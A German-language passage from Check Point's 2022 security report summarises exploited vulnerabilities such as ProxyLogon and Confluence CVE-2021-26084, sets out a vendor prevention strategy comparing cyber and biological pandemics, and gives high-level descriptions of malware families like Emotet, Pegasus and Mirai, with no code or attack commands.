„PROXYLOGON“ MICROSOFT EXCHANGE SERVER- AUTHENTIFIZIERUNGSUMGEHUNG (CVE-2021-26855) ProxyLogon ist die Bezeichnung, die Forscher von DEVCORE einer Schwachstelle zur Umgehung der Authentifizierung (CVE-2021-26855) gegeben haben, die sie erstmals Ende 2020 entdeckt und gemeldet haben. In Verbindung mit anderen Schwachstellen (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) kann diese Infektionskette zur Ausführung von Remote-Code auf jedem ungepatchten Mainstream Exchange Server führen. ProxyLogon wurde von mehreren APT- Gruppen in freier Wildbahn ausgenutzt. Im August startete Earth Baku eine Kampagne in der Region Indien-Pazifik, bei der SQL-Injection und ProxyLogon als Zugangsvektoren genutzt wurden. Im September nutzte die Cyberspionage- Gruppe FamousSparrow die Schwachstelle sowie die Hintertür SparrowDoor für Angriffe auf Hotelketten, Regierungen, Privatunternehmen und verschiedene andere Bereiche weltweit aus. Eine andere Bedrohungsgruppe, SquirrelWaffle, wurde dabei beobachtet, wie sie Microsoft Exchange-Server mit ProxyShell und

ProxyLogon hackte, um Malware über bösartige E-Mails zu verbreiten.

ATLASSIAN CONFLUENCE – REMOTE CODE EXECUTION (CVE-2021-26084) Diese kritische Remote Code Execution in Atlassian Confluence Server und Confluence Data Center, die im August 2021 veröffentlicht wurde, hat ihren Ursprung in der Object Graph Navigation Language. Sie kann ohne Authentifizierung ausgenutzt werden und erlaubt einem entfernten Angreifer, beliebigen Code auf dem betroffenen System auszuführen.Atlassian hat Patches für die betroffenen Unternehmen und mehrere Proof-of-Concept- Exploits veröffentlicht. Die Bedrohungsakteure suchten anschließend nach der Schwachstelle, um Kryptominer zu installieren. Im September versuchte der Kryptojacker z0Miner, Mining-Operationen auf anfälligen Rechnern durchzuführen. Im Oktober wurde der Ransomware-Betreiber Atom Silo dabei beobachtet, wie er

ungepatchte Computer ausnutzte, um Ransomware-Angriffe zu starten.

K A P I T E L 6

https://proxylogon.com/ https://gbhackers.com/earth-baku-apt-hackers/ https://gbhackers.com/earth-baku-apt-hackers/ https://www.darkreading.com/threat-intelligence/famoussparrow-apt-group-flocks-to-hotels-governments-businesses https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html https://cyberintelmag.com/cloud-security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/ https://www.zdnet.com/article/this-cryptocurrency-miner-is-exploiting-the-new-confluence-remote-code-execution-bug/ https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/

57CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 57CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 34: Prozentualer Anteil der Angriffe, die Schwachstellen ausnutzen, nach Bekanntwerden im Jahr 2021.

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

Earlier

0 5 10 15 20

2%

11%

5%

12%

17%

7%

8%

10%

6%

8%

3%

11%

Viele der 2017 entdeckten Schwachstellen waren auch 2021 noch sehr präsent. Dies ist vor allem auf bekannte Schwachstellen wie die Apache Struts2 Remote Code Execution (CVE-2017-5638), die in das Mirai-Botnet integriert ist, oder die PHPUnit Remote Code Execution (CVE-2017-9841) zurückzuführen, die häufig zur Ausnutzung anfälliger WordPress-Plugins verwendet wird.

Die Schwachstellen aus dem Jahr 2020 sind nach wie vor bekannt und wurden in 11 % der Angriffe ausgenutzt. Zu den wichtigsten gehören die Pufferüberlaufschwachstellen der Draytek Vigor-Serie (CVE-2020-10826, CVE- 2020-10827, CVE-2020-10828), die einen Anteil von 41 % an den weltweiten Auswirkungen auf Unternehmen hatten. Diese Schwachstellen könnten ausgenutzt werden, um beliebigen Code auf verwundbaren Draytek-Routern auszuführen,

indem eine speziell gestaltete HTTP-Anfrage aus der Ferne gestellt wird.

K A P I T E L 6

https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ https://isc.sans.edu/diary/28084 https://isc.sans.edu/diary/28084

58CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 58CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 35: Prozentualer Anteil der Angriffe, die Schwachstellen ausnutzen, nach dem Jahr des

Bekanntwerdens pro Monat.

JA N

21 FE

B 2 1

MA R 2

1

AP R 2

1

MA Y 2

1

JU N

21 JU

L 2 1

AU G 2

1 SE

P 2 1

OC T 2

1

NO V 2

1

DE C 2

1

100%

90%

80%

70%

60%

50%

40%

30%

20%

10%

0%

2021 2020 2019 2018 2017 2016 2015 2014 2013 2012 2011 Older

Im Jahr 2021 wurde im Vergleich zu den Vorjahren eine langsamere Anpassung der

Schwachstellen beobachtet. Das Diagramm zeigt, dass diese Schwachstellen ab

Mitte des Jahres 2021 zunehmend von Hackern ausgenutzt wurden, was mit einem

leichten Rückgang bei der Ausnutzung von CVEs im Vergleich zu 2017 einhergeht.

59CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

VON JONY FISCHBEIN CISO bei Check Point Software

K A P I T E L 7

DIE NÄCHSTE CYBERPANDEMIE VERHINDERN – EINE STRATEGIE FÜR BESSERE CYBERSICHERHEIT

07

60CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 60CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

BEDROHUNGSPRÄVENTION – VERHINDERUNG VON ANGRIFFEN, BEVOR SIE GESCHEHEN Eine der größten Herausforderungen für Sicherheitsexperten sind Mega-Angriffe der Generation V – eine Kombination aus einer Vielzahl von Bedrohungen, groß angelegten Angriffen und einer großen Angriffsfläche. Ein wirklich umfassender Schutz erfordert eine Architektur, die Angriffe verhindert, bevor sie stattfinden. Letztlich geht es darum, alle Angriffe über alle möglichen Vektoren abzuwehren. Eine Sicherheitsarchitektur, die eine einheitliche und zusammenhängende Schutzinfrastruktur ermöglicht und erleichtert, bietet einen umfassenderen und schnelleren Schutz als eine Infrastruktur, die aus einzelnen Teilen besteht, die nicht zusammenarbeiten. Dies ist das Herzstück dessen, was Check Point Infinity bietet – eine Sicherheitsarchitektur, um Angriffe zu verhindern, bevor sie stattfinden.

WENN DER PERIMETER GRENZENLOS IST UND ANGRIFFE IMMER RAFFINIERTER WERDEN, BENÖTIGT IHR UNTERNEHMEN EINE ANGEMESSENE PRÄVENTION AUF GRUNDLAGE VON BEDROHUNGSDATEN IN ECHTZEIT Im derzeitigen Klima der Mega-Angriffe auf die Lieferkette und dem ständigen Kampf gegen neu entwickelte Malware sind Bedrohungsdaten und schnelle Reaktionsmöglichkeiten von entscheidender Bedeutung. Umfassende Informationen zur proaktiven Beseitigung von Bedrohungen, verwaltete Sicherheitsdienste zur Überwachung Ihres Netzwerks und Reaktionsmöglichkeiten auf Angriffe, um schnell auf diese zu reagieren und sie zu beseitigen, sind entscheidend, damit Ihr Unternehmen auch im Jahr 2022 seinen Betrieb uneingeschränkt fortsetzen kann. Malware entwickelt sich ständig weiter, sodass Bedrohungsdaten für fast jedes Unternehmen ein unverzichtbares Hilfsmittel sind. Wenn ein Unternehmen finanzielle, persönliche, intellektuelle oder nationale Werte zu erhalten und zu schützen hat, ist ein umfassenderer Sicherheitsansatz die einzige Möglichkeit, sich gegen die heutigen Angreifer zu schützen – und eine der effektivsten proaktiven Sicherheitslösungen heutzutage sind Bedrohungsdaten. Bedrohungsdaten müssen alle Angriffsflächen abdecken, einschließlich Cloud, Mobilgeräte, Netzwerk, Endpunkt und IoT, da diese Vektoren in einem Unternehmen alltäglich sind. Bedrohungsdaten sind nicht einfach nur Daten – sie sind Praxis, und sie sollten die Entwicklung hin zu einem präventiven Ansatz vorantreiben, bei dem Angriffe blockiert werden, bevor sie entstehen. Sie sollte außerdem die beste Erkennungsquote für bekannte und unbekannte Bedrohungen bieten und Fehlalarme so weit wie möglich vermeiden, damit Benutzer so wenig wie möglich gestört werden.

K A P I T E L 7

61CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 61CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

SICHERN SIE ALLES, DENN ALLES IST EIN POTENZIELLES ANGRIFFSZIEL Um eine effektive Abdeckung zu erreichen, sollten Organisationen eine einzige Lösung suchen, die alle Angriffsflächen und -vektoren abdecken kann. In einer multihybriden Umgebung, in der der Perimeter grenenlos ist, sollte die Sicherheit in der Lage sein, alles zu schützen.

E-Mail, Webbrowsing, Server und Speicher sind nur der Anfang. Mobile Anwendungen, Cloud und externer Speicher sind ebenso wichtig wie die Einhaltung von Vorschriften für verbundene mobile Geräte und Endgeräte sowie für den wachsenden Bestand an IoT-Geräten. Auch Workloads, Container und serverlose Anwendungen in Multi- und Hybrid-Cloud-Umgebungen sollten stets auf der Checkliste stehen. Mit der raschen Verlagerung auf Cloud- und hybride Workloads ist eine robuste Strategie zur Vermeidung von Sicherheitsverletzungen noch wichtiger geworden.

EINSATZ EINER VOLLSTÄNDIG VEREINHEITLICHTEN ARCHITEKTUR Ein umfassender Überblick über Ihr gesamtes Netzwerk, der durch Konsolidierung gewonnen wird, ist heute unerlässlich, um sich vor immer raffinierteren Angriffen zu schützen.

Viele Unternehmen versuchen, ihre Sicherheit mit einem Flickenteppich von Einzelprodukten verschiedener Anbieter aufzubauen, scheitern aber oft und haben Sicherheitslücken, die durch unzusammenhängende Technologien verursacht werden. Dieser Ansatz verursacht auch einen enormen Aufwand, da er auf der Verwendung mehrerer Systeme und Anbieter beruht, statt auf einer integrierten Lösung. Um eine umfassende Sicherheit zu erreichen, sollten Unternehmen daher einen einheitlichen mehrschichtigen Ansatz verfolgen, der alle IT-Elemente schützt, einschließlich Netzwerke, Endgeräte, Cloud, Mobilgeräte und IoT, die alle dieselbe Präventionsarchitektur nutzen und in Echtzeit mit denselben Bedrohungsdaten versorgt werden.

K A P I T E L 7

62CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 62CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

∙ Schulung der Mitarbeiter zur Erkennung potenzieller Bedrohungen: Die Schulung der Benutzer war schon immer ein Schlüsselelement zur Vermeidung von Malware-Infektionen. Es ist wichtig zu wissen, woher die Dateien stammen, warum der Mitarbeiter sie erhält und ob er dem Absender vertrauen kann, bevor er Dateien und E-Mails öffnet.Die häufigsten Infektionsmethoden bei Ransomware- Kampagnen sind nach wie vor Spam- und Phishing-E-Mails. In vielen Fällen kann die Sensibilisierung der Benutzer einen Angriff verhindern, bevor er stattfindet. Nehmen Sie sich die Zeit, Ihre Benutzer zu schulen, und stellen Sie sicher, dass sie, wenn sie etwas Ungewöhnliches bemerken, dies sofort an

Ihre Sicherheitsteams melden.

AUFRECHTERHALTUNG DER SICHERHEITSHYGIENE

∙ Patching: Allzu oft sind Angriffe erfolgreich, indem sie bekannte Schwachstellen ausnutzen, für die zwar ein Patch existiert, der aber nicht angewendet wurde. Unternehmen sollten sicherstellen, dass für alle Systeme und Software aktuelle Sicherheitspatches zur Verfügung stehen.

∙ Segmentierung: Netzwerke sollten durch Implementierung wirksamer Firewall- und IPS-Schutzmaßnahmen zwischen den Netzwerksegmenten segmentiert werden, um die Ausbreitung von Infektionen im gesamten Netzwerk einzudämmen.

INFEKTIONSRATE Virusinfektionsrate (Ro) (Quelle: WHO) Durchschnittliche Anzahl an Menschen, die eine Person mit einem Virus infiziert: Grippe: 1,3, SARS: 2-4, Corona: 2,5, Ebola: 1,6-2, Zika: 2-6,6, Masern: 11-18

INFEKTIONSPRÄVENTION Die beste Therapie: Impfung Best Practices zum Umgang mit der Infektion: 1) Quarantäne, Unterbringung vor Ort 2) Isolation 3) Kontaktverfolgung

BEST PRACTICES FÜR DIE SICHERHEIT Allgemeine Therapie (bis Impfung): 1) Maske 2) Hygiene 3) Soziale Distanzierung

BIOLOGISCHEPANDEMIE

INFEKTIONSRATE Malware-Infektionsrate (Ro) Durchschnittliche Anzahl der Hosts, die ein Host mit Malware infiziert: Cyberangriff: >27 (Quelle: WEF, NSTU) Slammer: Verdoppelt seine Größe alle 8,5 Sekunden Code Red: 2.000 neue Hosts pro Minute

INFEKTIONSPRÄVENTION Die beste Therapie: Echtzeit-Prävention Best Practices: Ein kontinuierlicher Prozess aus: 1) Quarantäne: Sandboxing, Mikro-Segmentierung 2) Isolation: Zero Trust, Segregation 3) Verfolgung: Bedrohungsdaten, AI, SOC, Posture-Management

BEST PRACTICES FÜR DIE SICHERHEIT 1) Bewusstsein: Erst nachdenken, dann klicken … 2) Cyber-Hygiene: Patches, Compliance … 3) Asset-Distanzierung: Netzwerksegmentierung, Multifaktor-Authentifizierung …

CYBER-PANDEMIE

BIOLOGISCHE PANDEMIE VS. CYBER-PANDEMIE Ähnlichkeiten und Parallelisierung, Erkenntnisse

K A P I T E L 7

63CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 63CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Inhalten und vieles mehr. Jede dieser Technologien kann in bestimmten Szenarien sehr effektiv sein und bestimmte Dateitypen oder Angriffsvektoren abdecken. Starke Lösungen integrieren eine breite Palette von Technologien und Innovationen, um moderne Angriffe in IT-Umgebungen wirksam zu bekämpfen. Zusätzlich zu den traditionellen, signaturbasierten Schutzmaßnahmen wie Virenschutz und IPS müssen Unternehmen weitere Schichten implementieren, um sich vor neuer, unbekannter Malware zu schützen, die über keine bekannte Signatur verfügt. Zwei wichtige Komponenten sind die Bedrohungsbereinigung (Dateibereinigung) und die Bedrohungsemulation (erweitertes Sandboxing). Jedes Element bietet einen eigenen Schutz, der in Kombination eine umfassende Lösung zum Schutz vor unbekannter Malware auf Netzwerkebene und direkt auf den Endgeräten darstellt.

∙ Prüfen: Richtlinien für Sicherheitsprodukte müssen sorgfältig überprüft und Vorfallprotokolle und Warnungen kontinuierlich überwacht werden.

∙ Untersuchen: Routine-Audits und Penetrationstests sollten über alle Systeme hinweg durchgeführt werden.

∙ Grundsatz der geringsten Privilegien: Benutzer- und Software-Rechte sollten auf ein Minimum beschränkt werden – Müssen wirklich alle Benutzer lokale Administratorrechte auf ihren Geräten haben?

∙ Implementierung der fortschrittlichsten Sicherheitstechnologien: Es gibt kein Patentrezept, das vor allen Bedrohungen und allen Bedrohungsvektoren schützen kann. Es gibt jedoch viele großartige Technologien und Ideen – maschinelles Lernen, Sandboxing, Anomalie-Erkennung, Entschärfung von

K A P I T E L 7

64CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

FAZIT: Wie vorhergesagt, haben wir in einem Jahr, das mit den Auswirkungen eines der verheerendsten Angriffe auf die Lieferkette in der Geschichte begann, gesehen, dass Bedrohungsakteure an Selbstvertrauen und Raffinesse gewonnen haben. Am Ende des Jahres gipfelte dies in der Ausnutzung der Log4j-Schwachstelle, die Sicherheitsexperten wieder einmal unvorbereitet traf und das schiere Ausmaß der Risiken für die Software-Lieferkette in den Vordergrund stellte. In den dazwischen liegenden Monaten wurden Cloud-Dienste angegriffen, Bedrohungsakteure konzentrierten sich zunehmend auf Mobilgeräte, die Colonial Pipeline wurde erpresst und eines der gefährlichsten Botnets der Geschichte tauchte wieder auf.

Doch es sieht nicht alles düster aus. Im Jahr 2021 wurden die Risse im Ransomware-Ökosystem noch größer, da Regierungen und Strafverfolgungsbehörden auf der ganzen Welt beschlossen haben, härter gegen Ransomware-Gruppen vorzugehen. Anstatt sich auf reaktive Maßnahmen und Abhilfe zu verlassen, wurden die Regierungen durch einige schockierende Ereignisse darauf aufmerksam gemacht, dass sie einen präventiven, proaktiven Ansatz für den Umgang mit Cyberrisiken wählen müssen. Diese Philosophie gilt auch für Unternehmen, die es sich nicht mehr leisten können, einen unzusammenhängenden, isolierten und reaktionären Ansatz im Umgang mit Bedrohungen zu verfolgen. Sie benötigen umfassende Sichtbarkeit, Bedrohungsdaten in Echtzeit und eine Sicherheitsinfrastruktur, die effektiv und vernetzt eingesetzt werden kann.

65CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 65CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

ANHANG BESCHREIBUNG VON MALWARE-FAMILIEN

66CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

AgentTesla AgentTesla ist ein fortgeschrittener RAT, der als Keylogger und Passwort-Stealer fungiert und seit 2014 aktiv ist. AgentTesla kann die Tastatureingabe des Opfers überwachen und erfassen, die Systemzwischenablage auslesen, Screenshots erstellen und Anmeldeinformationen stehlen, die zu einer Vielzahl von Software gehören, die auf dem Computer des Opfers installiert ist (einschließlich Google Chrome, Mozilla Firefox und den E-Mail-Client Microsoft Outlook). AgentTesla wird auf verschiedenen Online-Märkten und in Hacking-Foren verkauft.

AlienBot AlienBot ist ein Banken-Trojaner für Android, der im Untergrund als Malware-as- a-Service (MaaS) verkauft wird. Er unterstützt Keylogging, dynamische Overlays für den Diebstahl von Anmeldedaten sowie SMS-Harvesting zur Umgehung von 2FA. Weitere Fernsteuerungsmöglichkeiten werden über ein TeamViewer-Modul bereitgestellt.

Bazar Bazar Loader und Bazar Backdoor wurden 2020 entdeckt und werden in der Anfangsphase der Infektion von der WizardSpider-Gruppe verwendet. Der Loader ist für das Abrufen der nächsten Stufen zuständig; die Backdoor ermöglicht Persistenz. Auf die Infektionen folgt in der Regel eine groß angelegte Ransomware-Installation, die Conti oder Ryuk verwendet.

CryptoBot CryptoBot ist ein fortschrittlicher Kryptominer, der nach der Infektion die Wallets und Kontoinformationen des Opfers erfasst. Im Dezember 2021 wurde CryptoBot bei einer Kampagne beobachtet, die auf Benutzer mit einer Raubkopie des Windows- Betriebssystems abzielt.

Cl0p Cl0p ist eine Ransomware, die erstmals Anfang 2019 entdeckt wurde und sich vor allem gegen große Firmen und Konzerne richtet. Im Laufe des Jahres 2020 begannen die Betreiber von Cl0p die Strategie einer doppelten Erpressung, bei der die Angreifer nicht nur die Daten des Opfers verschlüsseln, sondern auch damit drohen, gestohlene Informationen zu veröffentlichen, wenn keine Lösegeldforderungen erfüllt werden. Im Jahr 2021 wurde die Cl0p-Ransomware für zahlreiche Angriffe verwendet, bei denen der Erstzugang durch Ausnutzung von Zero-Day-Schwachstellen in der Accellion File Transfer Appliance erlangt wurde.

67CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

DanaBot DanaBot ist ein in Delphi geschriebener modularer Banken-Trojaner, der auf die Windows-Plattform abzielt. Die Malware, die erstmals 2018 aufgetreten ist, wird über bösartige Spam-E-Mails verbreitet. Sobald ein Gerät infiziert ist, lädt die Malware aktualisierten Konfigurationscode und andere Module vom C&C-Server herunter. Zu den verfügbaren Modulen gehören ein „Sniffer“ zum Abfangen von Zugangsdaten, ein „Stealer“ zum Stehlen von Passwörtern aus gängigen Anwendungen, ein „VNC“- Modul zur Fernsteuerung und vieles mehr.

DarkGate DarkGate ist eine multifunktionale Malware, die seit Dezember 2017 aktiv ist und Ransomware, Diebstahl von Zugangsdaten, RAT und Kryptomining kombiniert. DarkGate ist hauptsächlich auf Windows-Betriebssysteme ausgerichtet und setzt eine Vielzahl von Ausweichtechniken ein.

Dridex Dridex ist ein Banken-Trojaner, der sich zu einem Botnet weiterentwickelte und auf die Windows-Plattform abzielt. Er wird durch Spam-Kampagnen und Exploit Kits verbreitet und ist auf WebInjects angewiesen, um Bankdaten abzufangen und an einen vom Angreifer kontrollierten Server umzuleiten. Dridex kontaktiert einen Remote-Server, sendet Informationen über das infizierte System und kann auch zusätzliche Module zur Fernsteuerung herunterladen und ausführen.

Emotet Emotet ist ein fortgeschrittener, sich selbst verbreitender und modularer Trojaner. Emotet wurde früher als Banken-Trojaner und jetzt als Verteiler für andere Malware oder bösartige Kampagnen eingesetzt. Er verwendet mehrere Methoden zur Aufrechterhaltung von Persistenz- und Ausweichtechniken, um eine Erkennung zu vermeiden. Darüber hinaus kann Emotet auch durch Phishing-Spam-E-Mails mit bösartigen Anhängen oder Links verbreitet werden.

FluBot FluBot ist eine Android-Malware, die über Phishing-SMS-Nachrichten (SMiShing) verbreitet wird, die sich meist als Logistik-Unternehmen ausgeben. Sobald der Benutzer auf den Link in der Nachricht klickt, wird er zum Download einer gefälschten Anwendung mit FluBot weitergeleitet. Nach der Installation verfügt die Malware über verschiedene Funktionen zum Erfassen von Anmeldedaten und zur Unterstützung der Smishing-Operation selbst, einschließlich des Hochladens der Kontaktliste und des Versendens von SMS-Nachrichten an andere Telefonnummern.

68CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

FlyTrap FlyTrap ist ein Android-Trojaner, der Facebook-Anmeldedaten, Standorte, E-Mail- Adressen, IP-Adressen und mehr abgreifen kann. Der Trojaner verbreitete sich ursprünglich über gefälschte Android-Apps auf Google Play, die die Nutzer dazu aufforderten, sich bei ihrem Facebook-Konto anzumelden. Derzeit nutzt FlyTrap JavaScript-Injektion, um eine Sitzung zu übernehmen, und sendet Daten an den C&C-Server, so dass die Angreifer von einem entfernten Standort aus Zugriff auf das Facebook-Konto erhalten können.

FormBook FormBook ist ein Infostealer für Windows-Betriebssysteme, der erstmals 2016 entdeckt wurde. Er wird als Malware-as-a-Service (MaaS) in Untergrund-Hacking- Foren aufgrund seiner starken Ausweichtechniken und seines relativ niedrigen Preises vermarktet. FormBook sammelt Anmeldeinformationen von verschiedenen Webbrowsern, erstellt Screenshots, überwacht und protokolliert Tastatureingaben und kann gemäß den Anweisungen seines C&C-Servers Dateien downloaden und ausführen.

Glupteba Glupteba ist eine seit 2011 bekannte Windows-Hintertür, die nach und nach zu einem Botnet gereift ist. 2019 umfasste es einen Mechanismus zur Aktualisierung der C&C-Adressen über öffentliche BitCoin-Listen, eine integrierte Browser-Stealer- Funktion und einen Router-Exploiter.

Hiddad Eine Android-Malware, die legitime Apps neu verpackt und sie an einen Third Party- Store weitergibt. Ihre Hauptfunktion ist die Anzeige von Werbung, wobei sie aber auch Zugriff auf wichtige, im Betriebssystem integrierte Sicherheitsdetails erhalten kann.

IcedID IcedID ist ein Banken-Trojaner, der erstmals im September 2017 auftauchte. Er verbreitet sich über E-Mail-Spam-Kampagnen und nutzt oft andere Malware wie Emotet, um sich zu verbreiten. IcedID nutzt Umgehungstechniken wie Prozessinjektion und Steganografie und stiehlt Finanzdaten von Benutzern sowohl über Weiterleitungsangriffe (installiert einen lokalen Proxy, um Benutzer auf gefälschte geklonte Websites umzuleiten) als auch über Webinjektionsangriffe.

Kinsing Kinsing wurde 2020 entdeckt und ist ein Golang-Kryptominer mit einer Rootkit- Komponente. Ursprünglich für die Ausnutzung von Linux-Systemen entwickelt, wurde Kinsing auf kompromittierten Servern installiert, indem Schwachstellen in internetorientierten Diensten ausgenutzt wurden. Später im Jahr 2021 wurde auch eine Windows-Variante der Malware entwickelt, mit der die Angreifer ihre Angriffsfläche vergrößern konnten.

69CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

LemonDuck LemonDuck ist ein erstmals 2018 entdeckter Kryptominer, der auf Windows- Systeme abzielt. Er verfügt über fortschrittliche Verbreitungsmodule, darunter das Spam-Versand, RDP-Brute-Forcing und Massenausnutzung über bekannte Sicherheitslücken wie BlueKeep. Im Laufe der Zeit wurde beobachtet, dass er E-Mails und Anmeldedaten erfasste und andere Malware-Familien wie Ramnit verbreitete.

LokiBot LokiBot ist ein Waren-Infostealer für Windows. Er sammelt Anmeldeinformationen aus einer Vielzahl von Anwendungen, Webbrowsern, E-Mail-Clients, IT- Administrationswerkzeugen wie PuTTY und anderen. LokiBot wurde in Hacker- Foren verkauft und es wird angenommen, dass sein Quellcode durchgesickert ist, so dass eine Reihe von Varianten erscheinen konnten. Er wurde erstmals im Februar 2016 identifiziert.

Mirai Mirai ist eine berüchtigte Internet-of-Things-Malware (IoT), mit der anfällige IoT- Geräte wie Webkameras, Modems und Router erfasst und in Bots verwandelt werden. Das Botnet wird von seinen Betreibern genutzt, um massive DDoS (Distributed Denial of Service)-Angriffe durchzuführen. Das Mirai Botnet tauchte erstmals im September 2016 auf und machte schnell Schlagzeilen aufgrund einiger groß angelegter Angriffe, darunter ein massiver DDoS-Angriff, mit dem das gesamte Land Liberia außer Gefecht gesetzt wurde, und ein DDoS-Angriff auf das Internet- Infrastrukturunternehmen Dyn, das einen erheblichen Teil der Infrastruktur des Internets der Vereinigten Staaten darstellt.

MyloBot MyloBot ist ein hochentwickeltes Botnet, das im Juni 2018 erstmals auftauchte und mit komplexen Ausweichtechniken ausgestattet ist, darunter Anti-VM-, Anti- Sandbox- und Anti-Debugging-Techniken. Das Botnet ermöglicht es einem Angreifer, die vollständige Kontrolle über das System des Benutzers zu übernehmen und zusätzliche Nutzlast von seinem C&C herunterzuladen.

NanoCore NanoCore ist ein Remote-Access-Trojaner, der auf Benutzer von Windows- Betriebssystemen abzielt und erstmals 2013 im Umlauf beobachtet wurde. Alle Versionen des RAT verfügen über Basis-Plugins und Funktionalitäten wie Screen- Capture, Krypto-Currency-Mining, Remote-Control des Desktops und Webcam- Sitzungsdiebstahl.

70CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

NRSMiner NSRMiner ist ein Kryptominer, der um November 2018 auftauchte und sich vor allem in Asien, insbesondere in Vietnam, China, Japan sowie Ecuador verbreitete. Nach der Erstinfektion nutzt er den berühmten EternalBlue SMB-Exploit, um sich auf andere anfällige Computer in internen Netzwerken zu verbreiten, und beginnt schließlich mit dem Abbau der Monero (XMR)-Kryptowährung.

Pegasus Pegasus ist eine hochentwickelte Spionagesoftware, die auf Android- und iOS- Mobilgeräte abzielt und von der israelischen NSO-Gruppe entwickelt wurde. Die Malware wird zum Verkauf angeboten, vor allem für Regierungsorganisationen und Unternehmen. Pegasus kann Schwachstellen ausnutzen, die es ihm ermöglichen, das Gerät unbemerkt zu übernehmen und die Malware zu installieren. Die Malware infiziert ihre Ziele über mehrere Wege: Verbreitung über Spear-Phishing-Nachrichten ohne Aktionen des Anwenders („Zero Click“), die einen bösartigen Link oder eine URL- Umleitung enthalten, und mehr. Die App verfügt über mehrere Spionagemodule, wie z. B. die Erstellung von Screenshots, die Aufzeichnung von Anrufen, den Zugriff auf Messaging-Anwendungen, Keylogging und die Exfiltration des Browserverlaufs.

Phorpiex Phorpiex (auch bekannt als Trik) ist ein Botnet, das seit 2010 aktiv ist und auf dem Höhepunkt seiner Verbreitung mehr als eine Million infizierter Hosts kontrollierte. Es ist dafür bekannt, andere Malware-Familien über Spam-Kampagnen zu verbreiten sowie groß angelegte Spam- und Sextorsionskampagnen zu unterstützen.

Qbot Qbot (auch bekannt als QakBot) ist ein Banken-Trojaner, der erstmals im Jahr 2008 auftauchte. Er wurde entwickelt, um die Bankdaten und Tastatureingaben eines Benutzers zu stehlen. Qbot setzt verschiedene Anti-VM-, Anti-Debugging- und Anti-Sandbox- Techniken ein, um die Analyse zu erschweren und einer Entdeckung zu entgehen.

Raccoon Der Raccoon Infostealer wurde erstmals im April 2019 beobachtet. Dieser Infostealer zielt auf Windows-Systeme und wird in Untergrundforen als MaaS (Malware-as-a-Service) verkauft. Es handelt sich um einen einfachen Infostealer, der in der Lage ist, Browser-Cookies, den Verlauf, Anmeldedaten, Kryptowährungs- Geldbörsen und Kreditkarteninformationen abzugreifen.

Ragnar Locker Ragnar Locker ist eine erstmals im Dezember 2019 entdeckte Ransomware. Sie setzt ausgeklügelte Umgehungstechniken ein, einschließlich der Bereitstellung als virtuelle Maschine auf Zielsystemen, um ihre Aktivität zu verbergen. Ragnar wurde bei einem Angriff gegen Portugals nationalen Stromversorger in einem Akt doppelter Erpressung eingesetzt, wobei die Angreifer sensible Daten veröffentlichten, die dem Opfer gestohlen worden waren.

71CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Ramnit Ramnit ist ein modularer Banken-Trojaner, der erstmals 2010 entdeckt wurde. Ramnit stiehlt Informationen zu Websitzungen und ermöglicht es den Betreibern, Kontodaten für alle vom Opfer genutzten Dienste zu stehlen, einschließlich Bankkonten, Unternehmenskonten und Konten in sozialen Netzwerken. Der Trojaner verwendet sowohl hartkodierte Domains als auch von einem DGA (Domain Generation Algorithmus) generierte Domains, um den C&C-Server zu kontaktieren und zusätzliche Module herunterzuladen.

RedLine Stealer Der RedLine Stealer ist ein aktueller Infostealer und wurde erstmals im März 2020 beobachtet. Er wird als MaaS (Malware-as-a-Service) verkauft und oft über bösartige E-Mail-Anhänge verbreitet. Er verfügt über alle Fähigkeiten eines modernen Infostealers – Abgreifen von Webbrowser-Informationen (Kreditkartendaten, Session-Cookies und Daten zur automatischen Vervollständigung), Abgreifen von Kryptowährungs-Wallets, Möglichkeit zum Herunterladen zusätzlicher Payloads und mehr.

Remcos Remcos ist eine RAT, die 2016 erstmals in freier Wildbahn aufgetreten ist. Remcos verbreitet sich über bösartige Microsoft Office-Dokumente, die an SPAM-E-Mails angehängt sind und ist so konzipiert, dass es die Microsoft Windows-UAC-Sicherheit umgeht und Malware mit erhöhten Berechtigungen ausführt.

RigEK RigEK, das älteste und bekannteste der derzeit in Betrieb befindlichen Exploit Kits, existiert seit Mitte 2014. Es wird in Hacker-Foren und über das TOR-Netzwerk angeboten. Einige „Unternehmer“ bieten inzwischen sogar Infektionen für Malware- Entwickler in kleinen Mengen an, die sich bislang keine vollumfänglichen Dienste leisten können. RigEK hat sich im Laufe der Jahre weiterentwickelt, um alles von AZORult und Dridex bis hin zu wenig bekannter Ransomware und Krypto-Minern zu liefern.

RubyMiner RubyMiner wurde erstmals im Januar 2018 im Einsatz entdeckt und zielt sowohl auf Windows- als auch auf Linux-Server ab. RubyMiner sucht nach anfälligen Webservern (wie PHP, Microsoft IIS und Ruby on Rails), die für das Krypto-Mining mit dem Open-Source Monero Miner XMRig verwendet werden können.

